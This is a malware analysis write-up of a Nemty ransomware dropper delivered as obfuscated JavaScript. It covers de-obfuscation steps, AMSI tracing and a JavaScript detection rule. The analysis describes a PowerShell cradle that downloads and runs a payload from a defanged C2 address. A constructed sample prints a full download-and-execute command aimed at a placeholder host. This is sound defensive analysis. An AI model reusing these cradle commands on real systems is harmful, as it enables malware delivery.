0x8 - Nemty Dropper.md

File metadata and controls

75 lines (44 loc) · 4.72 KB

Background - Nemty Ransomware

  • Nemty ransomware was first observed in the wild in August 2019 and its behavior is noted for being similar to GandCrab and Sodinokibi.

  • The source code includes an affiliate ID, which suggests its deployment as a service (rather than being used by a single threat actor for their own campaigns).

  • By default, the typical ransom request would be $1,000 worth of BTC (approximately 1/10th of a bitcoin at that time).

  • The malware is not very sophisticated and includes some oddly redundant features. For example, it is known to perform a language check for several ex-USSR countries but proceeds with execution regardless (Locky, by contrast, stops if it detects Language ID 0x19, the language ID for Russian).

  • At the time of this writing, Nemty has never been formally attributed to a specific threat actor.

  • Historically, it has been delivered via at least one botnet and one or more exploit kits.

  • Fortinet has a great technical write-up here.

Analysis

| Hash Type | File Hash |
| --- | --- |
| MD5 | ce58fe36343afdbe2b2a36f123ecb9a7 |
| SHA1 | ce17790e9c0d1547f25aa3d30e38b5f17eb9fc8a |
| SHA-256 | f3e743c919c1deaf5108d361c4ff610187606f450fabda0bea3786d4063511b1 |
  • The sample for this analysis is a .js file which appears to be heavily obfuscated.

Pasted image 20240704153003

  • Viewed in full in Visual Studio Code, the script is very ugly. We can clean it up with js-beautify.

  • Viewing the beautified contents, we see two calls to `eval`. In JavaScript, `eval` "evaluates JavaScript code represented as a string and returns its completion value." (source: Mozilla).

Pasted image 20240704172721 Pasted image 20240704172747

  • The presence of the `eval` calls implies that the script de-obfuscates itself and then executes the result. Given that, the next step is to emulate it with SpiderMonkey using `js -f malscript.js`.

  • Luckily, this turns out to be a very simple script once de-obfuscated.

Pasted image 20240704173038
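Emulating the script lets the `eval` layers unwrap themselves, but it also runs whatever the final layer contains. A safer way to get the same result is to shadow `eval` (and the WSH objects the final stage expects) with recording stubs, so every layer is captured and nothing reaches the host. The following is an added example, not code from the write-up or from the sample; the two-layer `eval(String.fromCharCode(...))` script it unwraps is constructed here to mimic the shape described above, and `unwrapEvalLayers`, `wrapInFromCharCode` and the stubbed `ActiveXObject`/`WScript` are names chosen for this example.

```javascript
// Added example (not from the original write-up): unwrapping eval-layered JScript
// without letting it touch the host. The sample below is CONSTRUCTED to mimic the
// shape described in the analysis (two nested evals, then ActiveX); it is not the
// real dropper.

// Build one obfuscation layer: the code becomes an eval(String.fromCharCode(...)) call.
function wrapInFromCharCode(code) {
  const codes = Array.from(code, (ch) => ch.charCodeAt(0)).join(',');
  return `eval(String.fromCharCode(${codes}));`;
}

// Constructed final stage: the kind of code a dropper reaches after de-obfuscation.
const FINAL_STAGE =
  'var sh = new ActiveXObject("WScript.Shell");' +
  'sh.Run("cmd.exe /c powershell -w hidden -c echo constructed-sample", 0);';

// Two layers of eval, like the sample in the write-up.
const OBFUSCATED_SAMPLE = wrapInFromCharCode(wrapInFromCharCode(FINAL_STAGE));

// Run the script with eval/ActiveXObject/WScript shadowed by stubs. Each string
// handed to eval is recorded as a layer and then fed back through the same stubs,
// so nested layers unwrap; COM instantiation and method calls are recorded
// instead of executed.
function unwrapEvalLayers(source, maxDepth = 10) {
  const layers = [];  // every string handed to eval, outermost first
  const activex = []; // ProgIDs passed to new ActiveXObject(...)
  const calls = [];   // method calls made on the stubbed COM objects

  function evalHook(code) {
    if (typeof code !== 'string') return code; // real eval returns non-strings untouched
    layers.push(code);
    if (layers.length > maxDepth) throw new Error('eval nesting exceeded maxDepth');
    return run(code);
  }

  function ActiveXObject(progId) {
    activex.push(progId);
    // Inert object: reading any property yields a function that records the call.
    return new Proxy({}, {
      get: (_target, method) => (...args) => {
        calls.push({ progId, method: String(method), args });
      },
    });
  }

  const WScript = {
    Echo: (...args) => calls.push({ progId: 'WScript', method: 'Echo', args }),
    Sleep: () => {},
    ScriptFullName: 'stub.js',
  };

  function run(code) {
    // Passing the names as parameters makes the script's own `eval(...)`,
    // `ActiveXObject` and `WScript` resolve to our stubs. Sloppy-mode code may
    // use `eval` as a parameter name, and a shadowed eval is an ordinary call.
    const fn = new Function('eval', 'ActiveXObject', 'WScript', code);
    return fn(evalHook, ActiveXObject, WScript);
  }

  run(source);
  return { layers, activex, calls };
}

// Stand-alone demo: print the recovered layers and the recorded COM activity.
const demo = unwrapEvalLayers(OBFUSCATED_SAMPLE);
console.log(JSON.stringify(demo, null, 2));
```

Run it with `node`; the last recovered layer is the plaintext final stage, and `calls` shows the `WScript.Shell.Run` invocation and its command line without `cmd.exe` ever being launched. Against a real sample the final layer will also reference other WSH objects (`Shell.Application`, `Scripting.FileSystemObject`); those land in `activex` as unknown ProgIDs, which is the cue to extend the stubs.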

  • We can also run it on a Windows machine using cscript, the built-in Windows Script Host. Combined with AMSI, this lets us see the de-obfuscated contents of the .js file.

  • To do this, we start from an administrative PowerShell console:

```powershell
# Start an ETW trace of the AMSI provider, run the script under cscript, then stop the trace.
logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets

cscript malscript.js

logman stop AMSITrace -ets

# Microsoft's AMSIScriptContentRetrieval.ps1 sample parses AMSITrace.etl and prints
# the script content AMSI was handed; run it from the directory it lives in.
.\AMSIScriptContentRetrieval.ps1 > malscript-output.txt
```

  • Here's a sample of what the output looks like after having used AMSI Script Content Retrieval:

Pasted image 20240704173535

  • The malicious .js file appears to instantiate two ActiveX objects: a WScript.Shell and a Shell.Application.
  • It then executes cmd.exe and passes it a command that launches PowerShell to do the following:
  1. Bypass the execution policy
  2. Spawn a hidden window
  3. Create a new web client object
  4. Use the newly created web client object to reach out to http://92.63.197[.]190/nnn[.]exe with a specific Google Chrome user-agent and save the payload in the %temp% directory as erb19.exe.
  5. Lastly, execute the newly staged payload.
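Every step in that chain is visible in a process-creation event for powershell.exe: the parameter abbreviations, the `Net.WebClient` cradle, the custom User-Agent, the `%temp%` staging path and the cmd.exe parent. The block below is an added example, not code from the write-up or from the sample, showing how a triage rule can score such an event. The two Sysmon-style process records are constructed for the example (the URL uses the documentation range 192.0.2.0/24 and the filenames are placeholders, not the real infrastructure), and `triagePowerShell`, `resolvePsParam` and `tokenize` are names chosen here; the powershell.exe parameter aliases come from Microsoft's about_PowerShell_exe documentation.

```javascript
// Added example (not from the original write-up): triage logic for the dropper's
// second stage, a PowerShell download cradle launched through cmd.exe. The process
// records are CONSTRUCTED (Sysmon-style fields); URL and filenames are placeholders.

// Documented powershell.exe parameter aliases; PowerShell also accepts any
// unambiguous prefix of a parameter name, which resolvePsParam handles.
const PS_PARAMS = {
  ExecutionPolicy: ['ex', 'ep'],
  WindowStyle: ['w'],
  NoProfile: ['nop'],
  NonInteractive: ['noni'],
  EncodedCommand: ['e', 'ec'],
  Command: ['c'],
};

// Map "-ep", "-exec", "-WindowStyle" etc. to a canonical parameter name, or null.
function resolvePsParam(token) {
  const name = token.replace(/^[-/]/, '').toLowerCase();
  for (const [canon, aliases] of Object.entries(PS_PARAMS)) {
    if (aliases.includes(name)) return canon;
  }
  const byPrefix = Object.keys(PS_PARAMS).filter((c) => c.toLowerCase().startsWith(name));
  return byPrefix.length === 1 ? byPrefix[0] : null;
}

// Split a command line on whitespace, keeping quoted segments as one token so the
// -Command payload is not mistaken for switches.
function tokenize(cmdline) {
  return cmdline.match(/"[^"]*"|'[^']*'|\S+/g) || [];
}

function triagePowerShell(record) {
  const findings = [];
  const cl = record.commandLine;
  const tokens = tokenize(cl);

  // 1. Parameter-level indicators: policy bypass, hidden window, encoded command.
  for (let i = 0; i < tokens.length; i++) {
    if (!/^[-/]/.test(tokens[i])) continue;
    const param = resolvePsParam(tokens[i]);
    const value = (tokens[i + 1] || '').toLowerCase();
    if (param === 'ExecutionPolicy' && /^(bypass|unrestricted)$/.test(value)) findings.push('execution policy bypass');
    if (param === 'WindowStyle' && value === 'hidden') findings.push('hidden window');
    if (param === 'EncodedCommand') findings.push('encoded command');
  }

  // 2. Content-level indicators matching the cradle described in the analysis.
  if (/new-object\s+(-typename\s+)?(system\.)?net\.webclient/i.test(cl)) findings.push('WebClient instantiated');
  if (/\.(downloadfile|downloadstring|downloaddata)\s*\(/i.test(cl)) findings.push('WebClient download');
  if (/\.headers(\.add\s*\(|\[)\s*['"]user-agent['"]/i.test(cl)) findings.push('custom User-Agent set');
  if (/(\$env:temp|%temp%)[^;]*\.exe/i.test(cl)) findings.push('executable staged under %TEMP%');
  if (/(start-process|invoke-item|&\s*\(?\s*\$env:temp)/i.test(cl)) findings.push('staged payload executed');

  // 3. Process ancestry: script host -> cmd.exe -> powershell.exe.
  const parent = (record.parentImage || '').toLowerCase();
  if (/\\cmd\.exe$/.test(parent)) findings.push('launched via cmd.exe');
  if (/\\(w|c)script\.exe$/.test(parent)) findings.push('launched directly by Windows Script Host');

  return { findings, verdict: findings.length >= 3 ? 'suspicious' : 'benign' };
}

// Constructed process-creation records: one shaped like the dropper's chain, one benign.
const SAMPLE_EVENTS = [
  {
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    parentImage: 'C:\\Windows\\System32\\cmd.exe',
    commandLine: [
      'powershell -ep bypass -w hidden -c "$w = New-Object Net.WebClient;',
      "$w.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0) Chrome/80.0');",
      "$w.DownloadFile('http://192.0.2.10/payload.exe', $env:temp + '\\stage2.exe');",
      "Start-Process ($env:temp + '\\stage2.exe')\"",
    ].join(' '),
  },
  {
    image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    parentImage: 'C:\\Windows\\explorer.exe',
    commandLine: 'powershell.exe -NoProfile -Command Get-Date',
  },
];

// Stand-alone demo.
for (const ev of SAMPLE_EVENTS) console.log(ev.parentImage, '->', triagePowerShell(ev));
```

The alias resolver matters more than it looks: a rule that only greps for `-ExecutionPolicy Bypass` misses `-ep bypass` and `-exec bypass`, both of which powershell.exe accepts. Scoring several weak indicators together rather than alerting on any one of them keeps ordinary `-NoProfile -Command` invocations from administrators out of the queue.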

Summary

  • This sample is a Nemty ransomware dropper that arrives to the end user as a heavily obfuscated .js file.
  • After the end user double-clicks it, it will be executed by cscript and execute malicious PowerShell via cmd.exe.
  • The PowerShell creates a new web-client object, assigns a Google Chrome user-agent, and downloads the second stage payload from the C2 server.
  • Lastly, the new payload gets executed on the victim machine.